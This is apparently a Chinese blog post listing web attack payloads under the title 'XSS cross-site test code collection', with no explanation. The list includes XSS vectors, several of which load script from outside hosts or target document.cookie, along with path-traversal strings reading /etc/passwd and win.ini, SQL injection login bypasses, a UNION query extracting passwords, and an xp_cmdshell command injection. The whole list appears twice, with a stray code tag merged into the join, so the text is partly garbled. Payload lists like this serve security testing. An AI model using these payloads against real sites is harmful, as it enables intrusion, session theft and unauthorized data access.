XSS跨站测试代码大全

  1. '><script>alert(document.cookie)</script>  
  2. ='><script>alert(document.cookie)</script>  
  3. <script>alert(document.cookie)</script>  
  4. <script>alert(vulnerable)</script>  
  5. %3Cscript%3Ealert('XSS')%3C/script%3E  
  6. <script>alert('XSS')</script>  
  7. <img src="javascript:alert('XSS')">  
  8. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp  
  9. %22%3cscript%3ealert(%22xss%22)%3c/script%3e  
  10. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
  11. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
  12. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  13. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  14. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
  15. %3f.jsp  
  16. %3f.jsp  
  17. <script>alert('Vulnerable');</script>  
  18. <script>alert('Vulnerable')</script>  
  19. ?sql_debug=1  
  20. a%5c.aspx  
  21. a.jsp/<script>alert('Vulnerable')</script>  
  22. a/  
  23. a?<script>alert('Vulnerable')</script>  
  24. "><script>alert('Vulnerable')</script>  
  25. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
  26. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  27. %3Cscript%3Ealert(document. domain);%3C/script%3E&  
  28. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
  29. 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
  30. http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
  31. ..\..\..\..\..\..\..\..\windows\system.ini  
  32. \..\..\..\..\..\..\..\..\windows\system.ini  
  33. '';!--"<XSS>=&{()}  
  34. <IMG src="javascript:alert('XSS');">  
  35. <IMG src=javascript:alert('XSS')>  
  36. <IMG src=JaVaScRiPt:alert('XSS')>  
  37. <IMG src=JaVaScRiPt:alert("XSS")>  
  38. <IMG src=javascript:alert('XSS')>  
  39. <IMG src=javascript:alert('XSS')>  
  40. <IMG src=javascript:alert('XSS')>  
  41. <IMG src="jav ascript:alert('XSS');">  
  42. <IMG src="jav ascript:alert('XSS');">  
  43. <IMG src="jav ascript:alert('XSS');">  
  44. "<IMG src=java\0script:alert(\"XSS\")>";' > out  
  45. <IMG src=" javascript:alert('XSS');">  
  46. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>  
  47. <BODY BACKGROUND="javascript:alert('XSS')">  
  48. <BODY ONLOAD=alert('XSS')>  
  49. <IMG DYNSRC="javascript:alert('XSS')">  
  50. <IMG LOWSRC="javascript:alert('XSS')">  
  51. <BGSOUND src="javascript:alert('XSS');">  
  52. <br size="&{alert('XSS')}">  
  53. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>  
  54. <LINK REL="stylesheet" href="javascript:alert('XSS');">  
  55. <IMG src='vbscript:msgbox("XSS")'>  
  56. <IMG src="mocha:[code]">  
  57. <IMG src="livescript:[code]">  
  58. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
  59. <IFRAME src=javascript:alert('XSS')></IFRAME>  
  60. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>  
  61. <TABLE BACKGROUND="javascript:alert('XSS')">  
  62. <DIV STYLE="background-image: url(javascript:alert('XSS'))">  
  63. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">  
  64. <DIV STYLE="width: expression(alert('XSS'));">  
  65. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>  
  66. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>  
  67. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>  
  68. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>  
  69. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
  70. <BASE href="javascript:alert('XSS');//">  
  71. getURL("javascript:alert('XSS')")  
  72. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
  73. <XML src="javascript:alert('XSS');">  
  74. "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"  
  75. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  
  76. <IMG src="javascript:alert('XSS')"  
  77. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  
  78. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">  
  79. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  80. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  81. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  82. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  83. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  84. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>  
  85. admin'--  
  86. ' or 0=0 --  
  87. " or 0=0 --  
  88. or 0=0 --  
  89. ' or 0=0 #  
  90. " or 0=0 #  
  91. or 0=0 #  
  92. ' or 'x'='x  
  93. " or "x"="x  
  94. ') or ('x'='x  
  95. ' or 1=1--  
  96. " or 1=1--  
  97. or 1=1--  
  98. ' or a=a--  
  99. " or "a"="a  
  100. ') or ('a'='a  
  101. ") or ("a"="a  
  102. hi" or "a"="a  
  103. hi" or 1=1 --  
  104. hi' or 1=1 --  
  105. hi' or 'a'='a  
  106. hi') or ('a'='a  
  107. hi") or ("a"="a[/code]'><script>alert(document.cookie)</script>  
  108. ='><script>alert(document.cookie)</script>  
  109. <script>alert(document.cookie)</script>  
  110. <script>alert(vulnerable)</script>  
  111. %3Cscript%3Ealert('XSS')%3C/script%3E  
  112. <script>alert('XSS')</script>  
  113. <img src="javascript:alert('XSS')">  
  114. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp  
  115. %22%3cscript%3ealert(%22xss%22)%3c/script%3e  
  116. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
  117. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
  118. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  119. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  120. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
  121. %3f.jsp  
  122. %3f.jsp  
  123. <script>alert('Vulnerable');</script>  
  124. <script>alert('Vulnerable')</script>  
  125. ?sql_debug=1  
  126. a%5c.aspx  
  127. a.jsp/<script>alert('Vulnerable')</script>  
  128. a/  
  129. a?<script>alert('Vulnerable')</script>  
  130. "><script>alert('Vulnerable')</script>  
  131. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
  132. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  133. %3Cscript%3Ealert(document. domain);%3C/script%3E&  
  134. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
  135. 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
  136. http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
  137. ..\..\..\..\..\..\..\..\windows\system.ini  
  138. \..\..\..\..\..\..\..\..\windows\system.ini  
  139. '';!--"<XSS>=&{()}  
  140. <IMG src="javascript:alert('XSS');">  
  141. <IMG src=javascript:alert('XSS')>  
  142. <IMG src=JaVaScRiPt:alert('XSS')>  
  143. <IMG src=JaVaScRiPt:alert("XSS")>  
  144. <IMG src=javascript:alert('XSS')>  
  145. <IMG src=javascript:alert('XSS')>  
  146. <IMG src=javascript:alert('XSS')>  
  147. <IMG src="jav ascript:alert('XSS');">  
  148. <IMG src="jav ascript:alert('XSS');">  
  149. <IMG src="jav ascript:alert('XSS');">  
  150. "<IMG src=java\0script:alert(\"XSS\")>";' > out  
  151. <IMG src=" javascript:alert('XSS');">  
  152. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>  
  153. <BODY BACKGROUND="javascript:alert('XSS')">  
  154. <BODY ONLOAD=alert('XSS')>  
  155. <IMG DYNSRC="javascript:alert('XSS')">  
  156. <IMG LOWSRC="javascript:alert('XSS')">  
  157. <BGSOUND src="javascript:alert('XSS');">  
  158. <br size="&{alert('XSS')}">  
  159. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>  
  160. <LINK REL="stylesheet" href="javascript:alert('XSS');">  
  161. <IMG src='vbscript:msgbox("XSS")'>  
  162. <IMG src="mocha:[code]">  
  163. <IMG src="livescript:[code]">  
  164. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
  165. <IFRAME src=javascript:alert('XSS')></IFRAME>  
  166. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>  
  167. <TABLE BACKGROUND="javascript:alert('XSS')">  
  168. <DIV STYLE="background-image: url(javascript:alert('XSS'))">  
  169. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">  
  170. <DIV STYLE="width: expression(alert('XSS'));">  
  171. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>  
  172. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>  
  173. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>  
  174. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>  
  175. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
  176. <BASE href="javascript:alert('XSS');//">  
  177. getURL("javascript:alert('XSS')")  
  178. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
  179. <XML src="javascript:alert('XSS');">  
  180. "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"  
  181. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  
  182. <IMG src="javascript:alert('XSS')"  
  183. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  
  184. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">  
  185. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  186. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  187. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  188. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  189. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  190. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>  
  191. admin'--  
  192. ' or 0=0 --  
  193. " or 0=0 --  
  194. or 0=0 --  
  195. ' or 0=0 #  
  196. " or 0=0 #  
  197. or 0=0 #  
  198. ' or 'x'='x  
  199. " or "x"="x  
  200. ') or ('x'='x  
  201. ' or 1=1--  
  202. " or 1=1--  
  203. or 1=1--  
  204. ' or a=a--  
  205. " or "a"="a  
  206. ') or ('a'='a  
  207. ") or ("a"="a  
  208. hi" or "a"="a  
  209. hi" or 1=1 --  
  210. hi' or 1=1 --  
  211. hi' or 'a'='a  
  212. hi') or ('a'='a  
  213. hi") or ("a"="a  
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值